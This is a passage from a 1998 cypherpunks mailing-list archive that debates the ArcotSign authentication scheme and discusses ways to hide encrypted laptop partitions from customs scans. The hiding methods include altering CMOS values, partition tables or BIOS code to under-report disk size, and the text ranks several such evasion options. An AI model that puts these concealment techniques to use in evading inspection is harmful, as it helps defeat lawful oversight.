> > I am ignorant about hardware. Question: Wouldn't it be possible to
> > somehow put information on a music CD?
> >
> 
> Absolutely, though the fact that it's r/w'able is going to set some flags
> off. Now if you can find somebody who makes R/W CD's that aren't blue,
> green, yellow, etc. and instead the clear that is normaly expected you might
> pull it off.

You could always compress the fuck out of the data and save it as 2d bar codes
(PDF417) in a printed book, or to photographic slides, or the inside of a silk
tie, or as a tatoo on your ass, or make your own under the skin transponder
chips and implant yourself with hundreds of them, etc...

(Sorry this thread is just getting too silly and so am I... :)

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@algroup.co.uk>
Date: Tue, 22 Sep 1998 06:58:17 +0800
To: Bruce Schneier <schneier@counterpane.com>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <199809220552.XAA17972@nyx10.nyx.net>
Message-ID: <360790AF.AAE039E2@algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Schneier wrote:
> 
> At 11:55 AM 9/22/98 +0100, Ben Laurie wrote:
> >Colin Plumb wrote:
> >>
> >> Doug, I'd just like to thank you for replying.  Even without looking at
> your
> >> description, the fact that you are willing to talk to doubters and admit
> >> the limitations of your technique make me a lot more comfortable believing
> >> that you have something.  You don't fit into either of the two standard
> >> types of snake-oil salesmen: The "I can't tell you because it's secret"
> >> sort, and the "it's totally unbreakable, cures world hunger and
> >> disposes of nuclear waste" sort.
> >
> >Clearly I failed to understand this, then:
> >
> >"This note doesn't tell everything about our method--we *are* developing
> >a commercial product, after all..."
> >
> >which somehow doesn't translate to "I can't tell you because it's
> >secret", it seems.
> 
> Well, _I_ think they can explain everything (and we hope to do an academic
> paper on the idea), but it's not my decision.

I hope you manage to persaude them then, because, as we all know, if it
is kept secret, then even B. Schneier saying it is great will not rescue
them from the snake-oil branding.

Cheers,

Ben.

-- 
Ben Laurie            |Phone: +44 (181) 735 0686| Apache Group member
Freelance Consultant  |Fax:   +44 (181) 735 0689|http://www.apache.org/
and Technical Director|Email: ben@algroup.co.uk |
A.L. Digital Ltd,     |Apache-SSL author     http://www.apache-ssl.org/
London, England.      |"Apache: TDG" http://www.ora.com/catalog/apache/

WE'RE RECRUITING! http://www.aldigital.co.uk/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 22 Sep 1998 13:14:38 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809221743.MAA05104@einstein.ssz.com>
Message-ID: <v03110700b22d93e4449b@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:43 PM -0500 9/22/98, Jim Choate wrote:
>Forwarded message:
>> 	I don't know how hard this would be, but how about running a
>> seperate memory check, and while those numbers are flashing on the screen,
>> do the wait for imput?
>
>So hide the keyscan in the memory counter code. Would work externaly, would
>probably not show up on TEMPEST. Since both the keyscan and the memory scan
>are repetitive TEMPEST might have a problem telling them apart. Provided you
>could get the keyscan in the same footprint as the mem check the BIOS
>would not show up as anomolous in size. As long as they're not running
>around doing checksums you'd be ok (I suspect).

	At a certain threat level or level of "interest" in your affairs,
whether you can hide the fact that you are using crypto or not is going to
become irrelevant.

	In otherwords, if your threat level realistically includes CIA/NSA
you're well and fucked. If "they" think you are a serious threat to them
(as opposed to being a serious threat to the government/country) they will
get you, they will lie, they will cheat, they will give some poor bastard
plastic surgery to look like you, and take pot shots at the president on
National TV, and then "escape custody".

	If you are operating at this level, you are trying to hide _your_
activities from prying eyes, true, but you are also trying to prevent
_others_ from being compromised.

	If your opponent is using tempest, you are operating at that level.
Tempest is expensive, and I'd imagine would have to be calibrated not only
for each processor ([3-6]86, with all the variations (sx/dx, celeron, xenon
etc,) as well as the NEC. AMD. and Cyrix clones thereof, ARM & StrongARM
processors, PPC 601/3/4/G-3 processors, Motorola 68k processors, sparc
processors etc) but (if you are looking at what the POST & BIOS actually
does) for each BIOS AND OS. This is NOT an easy task, nor can it be done by
a Bozo operating a X-Ray machine at an airport.

	If you have attacted enough attention to warrant the expense that
this investigation is bringing on, you better either be totally clean AND
on everyones good side, or they ARE going to find something. They're the
government, locking people up is what they do best.

--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Tue, 22 Sep 1998 12:37:40 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809212323.SAA19241@einstein.ssz.com>
Message-ID: <3607DFB6.CAC75C9C@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Mon, 21 Sep 1998 16:05:30 -0400
> > From: Sunder <sunder@brainlink.com>
> > Subject: Re: Stego-empty hard drives...
> 
> > What's this bullshit, eh?  Just overwrite the BIOS roms in your machine to
> > return all zeros for the sectors you don't want to show them.  Have some
> > special passphrase you have to type in while in the BIOS setup program to
> > deactivate this.  Most newer notebooks have flash upgradeable ROMs anyway.
> 
> What's this bullshit, eh?
> 
> I wonder how you propose to answer the question:
> 
> "Sir, exactly why are you typing that sentence into the computer at this
> time?"

Ah hem! To quote myself:

> > What's this bullshit, eh?  Just overwrite the BIOS roms in your machine to
> > return all zeros for the sectors you don't want to show them.  Have some
> > special passphrase you have to type in while in the BIOS setup program to
> > deactivate this.  Most newer notebooks have flash upgradeable ROMs anyway.
    ^^^^^^^^^^^^^^^
By "this" I mean the method of not allowing access to the hidden cylinders.  By
deactivating, I mean disabling the routine that hides the hidden cylinders,
thus letting you access the partition.

This means that you wouldn't be typing in the special passphrase in front of
the Customs official.  

It means that when >YOU< wish to use your encrypted partition (in the privacy
of your hotel root), you would type in the passphrase to activate it's
visibility and accesibility to the rest of your machine.  

Further that BY DEFAULT, the hidden space on the drive (preferably a partition)
would normally not be reported by the bios hiding the true number of cylinders
from the OS's.

> Now we have not only given them probably cause but clear evidence for a
> prior intent to commit a crime. Even if your hard drive is clean they're
> going to bust your ass.

How?  You won't type in the passphrase in front of them.   You'll let the bios
do its thing and HIDE the extra partion from their scanner.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jnbailly@west.raytheon.com
Date: Tue, 22 Sep 1998 15:53:17 +0800
To: proff@iq.org
Subject: Re[2]: ArcotSign (was Re: Does security depend on hardware?)
Message-ID: <0EZP00M0MDZ7T6@mail.hac.com>
MIME-Version: 1.0
Content-Type: text/plain


     Woah....  I hate to interject noise, but I have to comment.  Maybe 
     Bruce's reply WAS a bit curt and not terribly helpful.  But it's 
     better to just let it drop, and not resort to criticizing typos.  I'm 
     a member of this list in the hopes that I'll learn something.  While 
     it's true that I didn't learn anything from Bruce's reply, I don't 
     think anyone gains anything from grammar/spelling corrections!
     
     *smile*
     Jacob


______________________________ Reply Separator _________________________________
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
Author:  proff@iq.org at mime
Date:    9/22/98 10:40 AM


> >the legitimate user has, excepting the 'remembered secret'. Or is 
> >there anything wrong with my logic?
>
> Yes.  There is something wrong with you logic. 
>
> Bruce
> ********************************************************************** 
> Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
     
There's something wrong with you grammer.
     
Cheers,
Julian.




RFC-822-headers:
Received: from CONVERSION-DAEMON by mail.hac.com (PMDF V5.1-12 #26580)
 id <0EZP00401AHMT4@mail.hac.com> for "jacob n bailly"@mime.mail.hac.com; Tue,
 22 Sep 1998 12:37:00 -0700 (PDT)
Received: from PROCESS-DAEMON by mail.hac.com (PMDF V5.1-12 #26580)
 id <0EZP00401AHJSC@mail.hac.com> for "jacob n bailly"@mime.mail.hac.com; Tue,
 22 Sep 1998 12:36:58 -0700 (PDT)
Received: from fw-tu05.hac.com by mail.hac.com (PMDF V5.1-12 #26580)
 with ESMTP id <0EZP0028FAHI2D@mail.hac.com> for
 "jacob n bailly"@mime.mail.hac.com; Tue, 22 Sep 1998 12:36:56 -0700 (PDT)
Received: from toad.com ([140.174.2.1]) by fw-tu05.hac.com (8.9.0/8.9.0)
 with ESMTP id MAA16615 for <jnbailly@west.raytheon.com>; Tue,
 22 Sep 1998 12:38:01 -0700 (MST)
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3)
 id KAA03863 for coderpunks-outgoing; Tue, 22 Sep 1998 10:40:19 -0700 (PDT)
Received: from iq.org (proff@frame-gw.iq.org [203.4.184.233])
 by toad.com (8.7.5/8.7.3) with SMTP id KAA03857 for <coderpunks@toad.com>;
 Tue, 22 Sep 1998 10:40:13 -0700 (PDT)
Received: (qmail 17488 invoked by uid 110); Tue, 22 Sep 1998 17:40:08 +0000
Date: Wed, 23 Sep 1998 03:40:08 +1000 (EST)
From: proff@iq.org
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-reply-to: <4.0.2.19980922114142.00956610@mail.visi.com>
Sender: owner-coderpunks@toad.com
Message-id: <19980922174008.17487.qmail@iq.org>
MIME-version: 1.0
X-Mailer: ELM [version 2.4ME+ PL28 (25)]
Content-transfer-encoding: 7BIT
Precedence: bulk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 22 Sep 1998 07:18:24 +0800
To: Bruce Schneier <schneier@counterpane.com>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <3607960E.DD29B101@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Schneier wrote:
> 
> At 12:48 PM 9/22/98 +0100, Mok-Kong Shen wrote:
> >Bruce Schneier wrote:

> >> He uses a remembered secret and some mathematical magic.
> >
> >Another naive question: Why is the remembered secret not sufficient
> >(thus doing away with the magic)?
> 
> One of the significant improvements is that the scheme is immune to
> offline password guessing attacks.

If the 'mathematical magic' is not to be kept secret (as in principle
shouldn't for all crypto algorithms) then presumably one could
attack through brute forcing the 'remembered secrect', I guess.
(I suppose the 'remembered secret' has less bits then the 'password'
that is to be retrieved from the pool of millions with the
'mathematical magic'). So the advantages of the scheme appear to
remain unclear as a matter of principle.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Tue, 22 Sep 1998 13:28:19 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809221546.KAA04142@einstein.ssz.com>
Message-ID: <3607EB86.D71858FA@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:

> The point is that this is a weak approach with a variety of attacks open.

All stego methods are weak approaches at hiding data.  The point is to hide the
fact that there is hidden data and make it look like the notebook is a
perfectly normal unmodified notebook.  There's no perfect stego method that
cannot be detected by a determined analyzer.  You can hide all the data you
want in the low bits, but they naturally have biases (low entropy) that if not
present indicates stego (which has high entropy.)


> When one considers the amount of work required to collect BIOS'ed , reverse
> engineer them (unless you got lots of mullah), develop the crypto,
> develop the camouflage code, distribute the code, burn the ROM's, distribute
> the ROM's, cost of suitable TEMPEST monitors, etc. the benefit seems
> questionable at best.

Who the fuck is gonna run a tempest scanner on your notebook again?  Let's
stick to the scope of this: UK scans of your notebook using bootable floppies.
And tell me, if you were to modify your BIOS to get around this, WHY would you
need a tempest monitor?

Why would you need to collect BIOSes?  You only need to modify a single BIOS -
the one on >YOUR< notebook.  The camouflage code would be a few hundred bytes
at most unless you do something overly elaborate.

An EEPROM burner (which for flash upgradeable notebooks isn't needed) is fairly
cheap. JDR sold them for about $200 or less.  For flashable BIOSes this is
FREE!

Disassemblers (debuggers) are fairly cheap. DOS and WIN95 come with a simple
one called debug.  BIOSes run in 16 bit mode since booting requires that PC's
run in 16 bit mode and there are plenty of books and info on 16 bit x86
programming.  You don't need to disasemble everything in the BIOS, you just
need to disable the checksum routine the bios uses on itself, and you need to
slightly modify the place that detects the size of the IDE drive to not go
beyond a certain number of pointers.

Further, PC bioses do support BIOS extensions, you generally wouldn't need to
modify the existing BIOS very much at all.  If you can add a BIOS extension,
the existing BIOS will happily run code from it.  This is how SCSI adapters
provide booting capabilities from SCSI disks.  Of course it's a bit harder in a
notebook computer, but it too can be done.

Back in the days of the Commodore 64 which had only mono sound, it was fairly
comon to piggy back and solder a second sound chip on top of the existing one
with the exception of a few of the pins, and turn your C64 into a stero
machine.  (One of the pins was an address pin, the other were sound out.)  A
similar thing might be done with an EEPROM.

The way BIOSes work is that they can be set to either detect the IDE drive size
always, or just once.  Set them to NOT detect.  They store the drive type
(0-47) and size params in the battery backed up CMOS.  

An easy, but less effective thing to do is to simply write over the CMOS data
that says X cylinders, Y heads, Z sectors/track, and modify the partition table
a bit.   You can do both from DEBUG.  You'll have to write a tiny bit of
assembly, but not much.

But again, if they bypass the BIOS and talk directly to the IDE controller,
none of these techniques - short of modifying the IDE controller or drive,
won't work.
 
> Even if they can't crack it in may places (eg France) such actions would
> be prosecutable in and of themselves.

You forgot to say "If you get caught." :)  With successful stego, nobody other
than the owner knows that it's there.

If you visit France and have a notebook computer, expect the Ministry of
Whatever to sneak in your hotel room when you're not there and copy your
notebook's hard drive anyway.  Such things have been reported as industrial
espionage.  (Talk to the folks on the spyking list about getting refrences.)


One thing all you fine folks are forgetting is that there are MANY MANY types
of notebooks out there.  My money says that if they can't scan Mac's they also
won't be able to scan Sparc books, Alpha Books, Newtons, Palm Pilots, and many
WinCE palmtops either.  Just buy something exotic.

You don't need to over engineer this, keep in mind: what they're using are
use-once floppies which are discarded.  A floppy at most holds 1.7Mb of code. 
This code is used to SCAN your disk for contraband.  I don't know what they
scan for, but they aren't going to be able to fit decoders for EVERY type of
file system and every file format out there.


So far the viable non-bullshit, non-fictional solutions in order of ease of
implementations.

0. Don't go to the UK with a notebook computer.
1. Use FedEx.
2. Store the data on some other form of media (PC card disks, CD's, books, etc)
3. Use a non PC notebook that they can't scan, or one that can't use floppies
   or PCMCIA floppy drives in case they've got some around.
4. Modify the CMOS values in your notebook and your parition table.
5. Modify your BIOS to report a smaller disk
6. Same as 5 but prevent writes to the hidden space.
7. Have your BIOS not boot from floppies and boot only from the hard disk
   but make it look like it's booting normally, then run some sort of sandbox
   or emulator and let their software run under your code's control.
8. Modify your IDE controller or the controller card on the disk.

I say choice 0 is the best choice. :^)  Can we end this noisy thread or are
there other bright ideas?

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 22 Sep 1998 07:26:46 +0800
To: Bruce Schneier <schneier@counterpane.com>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <360797EF.A979141A@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Schneier wrote:
> 
> At 02:20 PM 9/22/98 +0100, Mok-Kong Shen wrote:

> >If the 'mathematical magic' is not to be kept secret (as in principle
> >shouldn't for all crypto algorithms) then presumably one could
> >attack through brute forcing the 'remembered secrect', I guess.
> 
> Yes, but only through an on-line protocol.   And if the server has some
> kind of "turn the user off after ten bad password guesses," then the
> atack doesn't work.

I remember someone wrote of the case where the attacker got the
file with the millions of passwords. Then if he also knows the
'mathematical magic' he could presumably do offline work. So I
suppose that the 'mathematical magic' has to be kept secret, which 
would work against the generally accepted crypto principles.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 14:11:50 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809221938.OAA06031@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 14:25:10 -0400
> From: Sunder <sunder@brainlink.com>
> Subject: Re: Stego-empty hard drives... (fwd)

> All stego methods are weak approaches at hiding data.

We're not discussin stego, we're discussing hidden disk partitions, not
hiding data in the lsb of of existing observable disk partitions or
something similar.

> Who the fuck is gonna run a tempest scanner on your notebook again?  Let's

Considering the cost of such a scanner (a few $10k/ea.) and assuming such
masking technology were to become commen place I doubt if very many
customs checkpoints at major transfer hubs wouldn't have them.

> Why would you need to collect BIOSes?  You only need to modify a single BIOS -
> the one on >YOUR< notebook.  The camouflage code would be a few hundred bytes
> at most unless you do something overly elaborate.

I suspect it would be several k actualy since it is going to have to
include the encryption code, device drivers, wedgers, etc.

> Disassemblers (debuggers) are fairly cheap. DOS and WIN95 come with a simple
> one called debug.

A disassembler isn't a a debugger. All a disassembler does is convert the
hex to symbols (see frankenstein for an excellent design).

> programming.  You don't need to disasemble everything in the BIOS, you just
> need to disable the checksum routine the bios uses on itself, and you need to
> slightly modify the place that detects the size of the IDE drive to not go
> beyond a certain number of pointers.

So much for your few hundred bytes.

> Further, PC bioses do support BIOS extensions, you generally wouldn't need to

Um, usualy they support wedging via a jump table. This means that not only 
do you still have the original code you wedged out but you have the new
code you've wedged in. A 2x penalty.

> provide booting capabilities from SCSI disks.  Of course it's a bit harder in a
> notebook computer, but it too can be done.

Nobody says it can't be done.

> One thing all you fine folks are forgetting is that there are MANY MANY types
> of notebooks out there.

With only a few dozen BIOS'es driving the whole kit and kaboodle.

> My money says that if they can't scan Mac's they also
> won't be able to scan Sparc books, Alpha Books, Newtons, Palm Pilots, and many
> WinCE palmtops either.  Just buy something exotic.

They're new, they will learn from their mistakes and it won't take long.
After all, they have your tax dollars to use...


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 22 Sep 1998 07:45:43 +0800
To: Bruce Schneier <schneier@counterpane.com>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <36079C71.1D2880EA@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Schneier wrote:
> 
> At 02:28 PM 9/22/98 +0100, Mok-Kong Shen wrote:
> >Bruce Schneier wrote:
> >>
> >> At 02:20 PM 9/22/98 +0100, Mok-Kong Shen wrote:
> >
> >> >If the 'mathematical magic' is not to be kept secret (as in principle
> >> >shouldn't for all crypto algorithms) then presumably one could
> >> >attack through brute forcing the 'remembered secrect', I guess.
> >>
> >> Yes, but only through an on-line protocol.   And if the server has some
> >> kind of "turn the user off after ten bad password guesses," then the
> >> atack doesn't work.
> >
> >I remember someone wrote of the case where the attacker got the
> >file with the millions of passwords. Then if he also knows the
> >'mathematical magic' he could presumably do offline work. So I
> >suppose that the 'mathematical magic' has to be kept secret, which
> >would work against the generally accepted crypto principles.
> 
> No.  The online protocol can be public.  Nothing has to be kept secret
> in order for this to work.  That would be stupid; we all know that.

I suppose you misunderstood me. I mean the 'mathematical magic'
cannot be made public. (Or is 'online protocol' = 'mathematical magic'?)
If the 'magic' is public then the attacker with the pool of passwords
could brute force offline.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 14:24:12 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809221948.OAA06096@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 13:04:15 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: Stego-empty hard drives... (fwd)

> 	At a certain threat level or level of "interest" in your affairs,
> whether you can hide the fact that you are using crypto or not is going to
> become irrelevant.

When you're at that level you don't carry the data across the line you 
get some Johnnie Mnemonic to do it for you or put it in a diplomatic pouch...

> 	If your opponent is using tempest, you are operating at that level.
> Tempest is expensive, and I'd imagine would have to be calibrated not only
> for each processor ([3-6]86, with all the variations (sx/dx, celeron, xenon
> etc,) as well as the NEC. AMD. and Cyrix clones thereof, ARM & StrongARM
> processors, PPC 601/3/4/G-3 processors, Motorola 68k processors, sparc
> processors etc) but (if you are looking at what the POST & BIOS actually
> does) for each BIOS AND OS. This is NOT an easy task, nor can it be done by
> a Bozo operating a X-Ray machine at an airport.

Consider that at any given time there are only a few hundred BIOS'es, made
from a few dozen base images, driving all the machines out there. The number
of companies that develop their own BIOS in toto for in-house products is next
to nil (I know of none). What they do is buy a license and then re-write the
sections they need to.

The TEMPEST signal will be effected by speed, I see no reason to suspect
that it's going to be processor dependant. Since the code gets executed
in the same sequence in these shared BIOS there is going to be a shared
footprint, which may get squeezed because of increased clock speed. Measuring
that footprint at ranges of inches is nowhere near as expensive as trying to
catch a monitor image from a block away.

If you store those few thousand footprints and do a compare any bozo can
in fact run the machine. Just sit and watch to see if the red light comes
on and call your supervisor.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <ryan@systemics.ai>
Date: Tue, 22 Sep 1998 13:51:41 +0800
To: cypherpunks@Algebra.COM
Subject: Arcot (fwd)
Message-ID: <19980922145220.E363@mises.systemics.ai>
MIME-Version: 1.0
Content-Type: text/plain



(originally to a bunch of places, but I misspelled "cypherpunks" in
the headers...)

(operating on generator power after hurricane georges struck Anguilla...)

The way I see it, there are n separate issues here, which should be
addressed separately.  The following are my summaries of the issues, using
the information I have available -- I have never seen any confidential
Arcot data, so I'm operating entirely from public sources.  It's
entirely possible my data or assumptions are incorrect -- I'd be very
happy to have someone correct me.

1) The Arcot system uses "software smartcard" repeatedly throughout its
marketing literature, and says that it provides similar security to
smartcards.  However, even in the technical paper recently posted to the
web by Arcot, it admits it does not provide resistance to a wide class
of attacks, including the two Stefan Brands mentioned:
	* Resistance to monitoring attacks on the CPU
	* End users reverse-engineering the system
I have issues with this use of the term "smartcard".  In fact, this 
system has *none* of the desirable properties of a smartcard, as users
can freely copy the authenticator.  It is, at best, equivalent to
an encrypted certificate on disk which can only be checked for
validity online (no local checksums, no structure to the cert, just
a raw random string).  The phrase "two factor authentication", used
throughout the marketing literature, is being used improperly -- 
two passwords (one remembered and one stored on disk, since the
ArcotSign authenticator is just a string of data) do not two-factor
authentication make, if two passwords (one remembered and one stored
as an encrypted certificate on disk) do not two-factor make.  It's an
open point whether both systems or neither are two-factor, but it's
pretty clear that the two are equivalent.
 
2) Scott Loftesness, the new CEO of DigiCash, proposed this system as 
potentially a viable alternative to hardware tamper resistance for 
electronic finance systems (DBS systems).  The threat model for real
electronic finance systems (including and especially DBS)
is in fact substantially more serious, as recent Rabobank windows client
attack demonstrates.  Once your customers *can* have money stolen by a
third party, it's up to you to prove they *haven't*, at least according
to US and other law, for small customers.  This means only institutions
capable of absorbing massive fraud (in absolute terms) can field
real electronic cash systems.  This is primarily a debate about
threat models for a specific application, rather than a technical one.

3) The system appears to use PKC for no reason -- it is a closed system,
like Kerberos, and only limits itself by using PKC.  Kerberos, developed
by some list participants *years* ago, appears to solve every problem
Arcot claims to solve.  Additionally, Kerberos (in some form) is now
being integrated into MS Windows NT, so it is widely available.

4) Bruce Schneier, one of the firm's technical advisors, says "it's not
[sufficient for] online real estate [presumably meaning high value
transactions with no recourse]", but that it is for "ninny net users in
chat rooms".  The apps Bruce Schneier seems to propose the Arcot system for
("systems like AOL" (read: porn sites on the WWW)) are more concerned with 
their users not being able to share passwords than anything else.  For
that application, simple IP-based security in addition to passwords is
sufficient, or other means of ensuring an authenticator is linked to
an individual.  The Arcot system does not provide security from this
issue (even though it is intended for closed networks, where such
functionality would be highly possible).

However, the firm's marketing information seems to be selling this to
corporate web sites, for protecting high value corporate data.  I find
it highly unlikely any board of directors would consider their proprietary
corporate data closer to "ninny net users in chat rooms" than something
requiring real security.

(Even people without real security requirements often want high security,
or at least systems with no known limitations -- I use high-grade encryption
to protect my credit card information, even though my liability is limited
to $50, and many other users are unwilling to use 40-bit crypto to protect
their credit card numbers.)

5) The point was raised that in a smartcard system, you don't know what
you're signing.  I agree completely.  However, in a smartcard system, you
can protect the *keys* to a far higher level than protecting the
*use* of the keys when the key is physically present.  This is a substantially
lower level of risk, particularly if a security policy is included in
the smart card, such as only disbursing a limited amount of money per
unit time, or monitoring suspicious transactions, or handling user
authentication through a strong external channel, such as a PIN reader
attached directly to the smartcard reader.

The earlier debate on smartcards vs. tamper-resistant computers with I/O
leads me to believe that for electronic cash in reasonable value ranges 
(>$1000), you most likely want to go with *more* than a smartcard (as in,
a tamper resistant computer), but certainly you don't want to go with *less*.

For many applications, a combination of trusted time (on the smartcard) and
a trusted smartcard (and perhaps location) would be sufficient -- a user
could then be made to prove they were not in a certain location at a certain
time when a transaction were made to absolve themselves of responsibility for
it.

6) "Hardware is expensive"  So is software.  The cost of implementing
any authentication mechanism, particularly in a closed system, is
relatively constant -- passwords through cheap hardware -- as most of the
cost is in administrative overhead, user training, etc.  I'd far rather
go with an $8 Dallas Semiconductor iButton plus $0-$100 software plus
$400/user training/etc. cost than $0 hardware plus $x software plus
the same user training cost.  In many systems, hardware is *cheaper* in
the long run, as users understand it better, are better at doing their
own key management, etc.  It is exactly for closed systems where hardware
solutions *shine* compared to software, even if they provide the *same*
security in absolute terms -- the hardware solution has lower life-cycle costs.

For an open system, or one where you have minimal control over the users
(such as AOL, or a porn WWW site, or whatever), the requirement that
software be added to the local machine is usually prohibitively expensive.
In that kind of application, all of the intelligence needs to go on the
server -- an online password checking system, coupled with standard browser
features like client certificates, is about the most you can expect, and
even that is pushing it (until MIT did cert support for Lynx, many of
my machines were unable to use certificates at all).

7) "The system is patent-pending."

I do not see how the system is provably higher in security or any
other worthwhile features than the following widely deployable, standard, 
free system:
* online password checking of user passwords, optionally changing in
some kind of one-time-pad system, passed through an SSL-encrypted link
to the server, such that if a password guess attempts were made, the
account could be locked out.

* encrypted local certificates, encrypted with optionally a different
passphrase, which do *not* need to be kept secret.

This provides "two factor" authentication to the same extent as the Arcot
system, is easy to implement using standard systems, and is conceptually
simple.

In the event that the Arcot system is no better than the above (which I
believe), which is *not* patentable, I fail to see why the issue of
whether Arcot's system can be patented is important.  The only parts
which could be patented (as far as I can tell) are accidental, not the
essential functionality of quasi-two factor authentication with online
password checking to prevent off-line attacks.


8) The various IP/patent/etc. issues

A company could implement open standards based authentication, in an
open way, publish papers on every detail of their system, etc. and still
make quite a bit of money.  They do this through the quality of their
*software engineering*, not the quality of their idea.  Ideas are expensive
to create, and impossible to keep secret, even with patents.  Once you
come up with an idea, most of what gives it value is the review process
itself, not the initial idea.  That's why the valuable ideas I can think of,
at least in crypto, have mainly come from universities and open research
labs -- they can more cheaply be reviewed.  Only the NSA has the resources
to make an idea valuable and also keep it closed (and if you believe
Payne, even they don't...)


I understand that Arcot is a commercial company, and that it's trying
to make money, but I don't think that actually counters any of the points
presented above -- if anything, it makes them stronger, as Arcot has
a strong desire to increase the value of its assets (the deliverable
authentication system) much more so than a random hacker working on this
as a curiosity.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 22 Sep 1998 08:25:45 +0800
To: Bruce Schneier <schneier@counterpane.com>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <3607A04E.BE164E44@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Schneier wrote:
> 
